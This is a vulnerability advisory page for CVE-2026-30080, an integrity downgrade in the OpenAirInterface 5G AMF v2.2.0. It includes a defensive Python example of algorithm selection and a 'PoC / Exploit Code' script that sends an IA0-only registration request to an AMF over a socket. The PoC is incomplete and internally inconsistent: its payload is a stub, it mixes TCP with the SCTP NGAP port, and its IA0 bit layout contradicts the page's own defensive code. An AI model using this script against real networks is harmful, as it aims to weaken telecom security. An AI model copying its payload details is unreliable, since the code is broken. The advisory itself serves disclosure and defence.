Security Vulnerability Report
CVE-2026-30080 CVSS 7.5 HIGH

CVE-2026-30080

Published: 2026-04-08 17:21:19
Last Modified: 2026-04-14 15:47:10

Description

OpenAirInterface v2.2.0 accepts a Security Mode Complete message without any integrity protection. The configuration supports the integrity algorithms NIA1 and NIA2, but if a UE sends an initial Registration Request that advertises only the IA0 security capability, OpenAirInterface accepts it and proceeds. The resulting downgraded security context makes replay attacks possible.
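
The AMF-side check whose absence the description reports, written here as an added example and not taken from OpenAirInterface: the integrity algorithm is chosen only from the configured list, null integrity is never negotiated for a normal registration, and an unprotected Security Mode Complete is refused. All function and class names are hypothetical, the capability octets are constructed samples, and the bit layout assumed is that of the 5G-IA octet of the UE security capability IE in 3GPP TS 24.501.

```python
# Added illustration; not OpenAirInterface code. All names are hypothetical.
from enum import IntEnum

PLAIN_NAS = 0  # security header type of an unprotected NAS message


class NIA(IntEnum):
    NIA0 = 0  # null integrity: MAC carries no protection
    NIA1 = 1
    NIA2 = 2
    NIA3 = 3


class RegistrationRejected(Exception):
    """No integrity algorithm acceptable to the network policy."""


def ue_integrity_caps(ia_octet):
    """Decode the 5G-IA octet: bit 8 (MSB) is 5G-IA0, bit 7 is 128-5G-IA1, ..."""
    return {alg for alg in NIA if ia_octet & (0x80 >> alg)}


def select_integrity(ia_octet, configured, emergency=False):
    """Return the first configured algorithm the UE supports.

    NIA0 is returned only for an emergency registration (the policy assumed
    here); a UE that offers nothing else is rejected instead of downgraded.
    """
    caps = ue_integrity_caps(ia_octet)
    for alg in configured:
        if alg != NIA.NIA0 and alg in caps:
            return alg
    if emergency and NIA.NIA0 in caps:
        return NIA.NIA0
    raise RegistrationRejected("UE offers no configured integrity algorithm")


def accept_security_mode_complete(selected, header_type, mac_verified):
    """Accept Security Mode Complete only if it is integrity protected."""
    if header_type == PLAIN_NAS or selected == NIA.NIA0:
        return False
    return bool(mac_verified)


if __name__ == "__main__":
    configured = [NIA.NIA2, NIA.NIA1]          # constructed AMF policy
    print(select_integrity(0xE0, configured))  # constructed UE: IA0+IA1+IA2
    try:
        select_integrity(0x80, configured)     # constructed UE: IA0 only
    except RegistrationRejected as exc:
        print("rejected:", exc)
```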

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:* - VULNERABLE
OpenAirInterface v2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept: OpenAirInterface Integrity Protection Downgrade
# This script simulates a UE sending a Registration Request with IA0 capability.
import socket

# Simulated NAS payload structure
# In a real scenario, this would be a binary encoded NAS PDU
# 5GS Mobile Identity + Security Capabilities (IA0 only)
nas_payload = bytes.fromhex(
    "7e00"  # Protocol Discriminator: Mobility Management (MM)
    "41"    # Message Type: Registration request
    # ... Mobile Identity (SUCI/SUPI) ...
    # ... Security Capabilities: 00000001 (Bit 0 for IA0, others 0 for NIA1/2/3) ...
    "01"    # UE Security Capability - indicating only IA0 support
)


def send_malicious_registration(amf_ip, amf_port):
    """
    Sends a registration request claiming no integrity support (IA0)
    to exploit the downgrade vulnerability in OAI v2.2.0.
    """
    try:
        # Establish SCTP or TCP connection to AMF (Simplified as TCP here)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((amf_ip, amf_port))

        print(f"[*] Sending Registration Request with IA0 only to {amf_ip}...")
        sock.send(nas_payload)

        response = sock.recv(4096)
        print(f"[+] Received response from AMF: {response.hex()}")

        # Analyze response to check if Security Mode Command allows IA0
        # If accepted, the vulnerability is confirmed.
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Replace with actual target AMF address
    TARGET_AMF_IP = "192.168.56.101"
    TARGET_AMF_PORT = 38412  # Standard NGAP port (SCTP usually)
    send_malicious_registration(TARGET_AMF_IP, TARGET_AMF_PORT)
```

References

https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30080", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:21:18.623", "lastModified": "2026-04-14T15:47:10.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. Configuration has supported integrity NIA1 and NIA2. But if an UE sends initial registration request with only security capability IA0, OpenAirInterface accepts and proceeds. This downgrade security context can lead to the possibility of replay attack."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}